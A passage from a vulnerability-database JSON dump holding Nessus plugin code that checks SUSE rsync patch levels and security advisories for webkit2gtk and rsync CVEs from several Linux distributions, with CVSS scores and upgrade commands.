11-SP4 :\n\nzypper in -t patch sledsp4-rsync-12344=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-rsync-12344=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-rsync-12344=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-rsync-12344=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"rsync-3.0.4-2.49.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:33:34", "description": "This update for rsync fixes two security issues and two non-security bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-8242: Checksum collisions leading to a denial of service (bsc#900914)\n\n - CVE-2014-9512: Malicious servers could send files outside of the transferred directory (bsc#915410)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : rsync (SUSE-SU-2016:0173-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8242", "CVE-2014-9512"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rsync", "p-cpe:/a:novell:suse_linux:rsync-debuginfo", "p-cpe:/a:novell:suse_linux:rsync-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0173-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88007", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0173-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88007);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-8242\", \"CVE-2014-9512\");\n script_bugtraq_id(74366);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : rsync (SUSE-SU-2016:0173-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rsync fixes two security issues and two non-security\nbugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-8242: Checksum collisions leading to a denial\n of service (bsc#900914)\n\n - CVE-2014-9512: Malicious servers could send files\n outside of the transferred directory (bsc#915410)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=900914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=922710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8242/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9512/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160173-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97a06216\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-113=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-113=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-113=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-113=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-debuginfo-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-debugsource-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"rsync-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"rsync-debuginfo-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"rsync-debugsource-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-debuginfo-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-debugsource-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"rsync-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"rsync-debuginfo-3.1.0-6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"rsync-debugsource-3.1.0-6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2023-06-28T06:51:03", "description": "\nThe following vulnerabilities have been discovered in the webkit2gtk\nweb engine:\n\n\n* [CVE-2020-9802](https://security-tracker.debian.org/tracker/CVE-2020-9802)\nSamuel Gross discovered that processing maliciously crafted web\n content may lead to arbitrary code execution.\n* [CVE-2020-9803](https://security-tracker.debian.org/tracker/CVE-2020-9803)\nWen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2020-9805](https://security-tracker.debian.org/tracker/CVE-2020-9805)\nAn anonymous researcher discovered that processing maliciously\n crafted web content may lead to universal cross site scripting.\n* [CVE-2020-9806](https://security-tracker.debian.org/tracker/CVE-2020-9806)\nWen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2020-9807](https://security-tracker.debian.org/tracker/CVE-2020-9807)\nWen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2020-9843](https://security-tracker.debian.org/tracker/CVE-2020-9843)\nRyan Pickren discovered that processing maliciously crafted web\n content may lead to a cross site scripting attack.\n* [CVE-2020-9850](https://security-tracker.debian.org/tracker/CVE-2020-9850)\n@jinmo123, @setuid0x0\\_, and @insu\\_yun\\_en discovered that a remote\n attacker may be able to cause arbitrary code execution.\n* [CVE-2020-13753](https://security-tracker.debian.org/tracker/CVE-2020-13753)\nMilan Crha discovered that an attacker may be able to execute\n commands outside the bubblewrap sandbox.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.28.3-2~deb10u1.\n\n\nWe recommend that you upgrade your webkit2gtk packages.\n\n\nFor the detailed security status of webkit2gtk please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/webkit2gtk](https://security-tracker.debian.org/tracker/webkit2gtk)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-15T00:00:00", "type": "osv", "title": "webkit2gtk - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2023-06-28T06:50:22", "id": "OSV:DSA-4724-1", "href": "https://osv.dev/vulnerability/DSA-4724-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-11-08T04:09:41", "description": "An update that fixes 8 vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 fixes the following issues:\n\n - Update to version 2.28.3 (bsc#1173998):\n + Enable kinetic scrolling with async scrolling.\n + Fix web process hangs on large GitHub pages.\n + Bubblewrap sandbox should not attempt to bind empty paths.\n + Fix threading issues in the media player.\n + Fix several crashes and rendering issues.\n + Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805,\n CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850,\n CVE-2020-13753.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1064=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-26T00:00:00", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-26T00:00:00", "id": "OPENSUSE-SU-2020:1064-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ND4YI5SEPKTGBXP5QOCJIWYUALJWMVUK/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-11-28T16:45:25", "description": "\n\nThe WebKitGTK project reports vulnerabilities:\n\n\nCVE-2020-9802: Processing maliciously crafted web content may lead to arbitrary code execution.\nCVE-2020-9803: Processing maliciously crafted web content may lead to arbitrary code execution.\nCVE-2020-9805: Processing maliciously crafted web content may lead to universal cross site scripting.\nCVE-2020-9806: Processing maliciously crafted web content may lead to arbitrary code execution.\nCVE-2020-9807: Processing maliciously crafted web content may lead to arbitrary code execution.\nCVE-2020-9843: Processing maliciously crafted web content may lead to a cross site scripting attack.\nCVE-2020-9850: A remote attacker may be able to cause arbitrary code execution.\nCVE-2020-13753: CLONE_NEWUSER could potentially be used to confuse xdg- desktop-portal, which allows access outside the sandbox. TIOCSTI can be used to directly execute commands outside the sandbox by writing to the controlling terminal\u2019s input buffer.\n\n\n\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-07-10T00:00:00", "type": "freebsd", "title": "webkit2-gtk3 -- multible vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-10T00:00:00", "id": "EFD03116-C2A9-11EA-82BC-B42E99A1B9C3", "href": "https://vuxml.freebsd.org/freebsd/efd03116-c2a9-11ea-82bc-b42e99a1b9c3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-11-28T16:55:40", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.28.3\"", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-07-26T00:00:00", "type": "gentoo", "title": "WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-26T00:00:00", "id": "GLSA-202007-11", "href": "https://security.gentoo.org/glsa/202007-11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-29T11:03:17", "description": "### Background\n\nFile transfer program to keep remote files into sync.\n\n### Description\n\nMultiple vulnerabilities have been discovered in rsync. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could write arbitrary files via symlink attacks.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll rsync users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/rsync-3.1.2\"", "cvss3": {}, "published": "2016-05-30T00:00:00", "type": "gentoo", "title": "rsync: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8242", "CVE-2014-9512"], "modified": "2016-05-30T00:00:00", "id": "GLSA-201605-04", "href": "https://security.gentoo.org/glsa/201605-04", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "mageia": [{"lastseen": "2023-11-28T16:48:37", "description": "Updated webkit2 packages fix security vulnerabilities: The webkit2 package has been updated to version 2.28.3, fixing several security issues and other bugs. \n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-08-16T13:53:46", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-08-16T13:53:46", "id": "MGASA-2020-0317", "href": "https://advisories.mageia.org/MGASA-2020-0317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-11-28T16:57:00", "description": "## Releases\n\n * Ubuntu 20.04 LTS\n * Ubuntu 19.10 \n * Ubuntu 18.04 ESM\n\n## Packages\n\n * webkit2gtk \\- Web content engine library for GTK+\n\nA large number of security issues were discovered in the WebKitGTK Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-07-14T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-14T00:00:00", "id": "USN-4422-1", "href": "https://ubuntu.com/security/notices/USN-4422-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T01:16:59", "description": "## Releases\n\n * Ubuntu 15.10 \n * Ubuntu 15.04 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * rsync \\- fast, versatile, remote (and local) file-copying tool\n\nIt was discovered that rsync incorrectly handled invalid filenames. A \nmalicious server could use this issue to write files outside of the \nintended destination directory.\n", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "ubuntu", "title": "rsync vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 